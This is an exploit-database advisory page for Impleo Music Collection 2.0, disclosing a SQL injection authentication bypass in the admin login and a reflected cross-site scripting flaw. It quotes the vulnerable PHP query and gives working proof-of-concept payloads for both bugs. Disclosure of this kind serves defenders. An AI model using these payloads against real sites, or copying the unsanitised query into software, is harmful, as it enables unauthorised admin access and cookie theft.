header-logo
Suggest Exploit
vendor:
Impleo Music Collection
by:
SirGod
7,5
CVSS
HIGH
SQL Injection (Auth Bypass) & Cross Site Scripting
89, 79
CWE
Product Name: Impleo Music Collection
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:impleo:impleo_music_collection
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities

Impleo Music Collection 2.0 is vulnerable to SQL Injection (Auth Bypass) and Cross Site Scripting. The vulnerable code is present in /admin/login.php, where the user input is not properly sanitized. An attacker can exploit this vulnerability to bypass authentication and execute arbitrary SQL commands. An attacker can also inject malicious JavaScript code in the application to perform Cross Site Scripting attacks.

Mitigation:

Input validation should be performed to prevent SQL Injection and Cross Site Scripting attacks.
Source

Exploit-DB raw data:

#################################################################################################################
[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
[+] Download: http://sappy.dk/impleo/download-impleo
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] SQL Injection ( Auth Bypass )

- Requirements : magic_quotes_gpc = off

- Vulnerable code in /admin/login.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 $postbruger = $_POST['username'];
 $postpass = md5($_POST['password']); 
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") 
or die("<p>" . mysql_error() . "</p>\n");
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- PoC 

  Login Username : admin ' or ' 1=1
  Login Password : anything


[+] Cross Site Scripting

- PoC 

    http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>

#################################################################################################################

# milw0rm.com [2009-06-15]

Navigation

Suggest Exploit

Services By CQR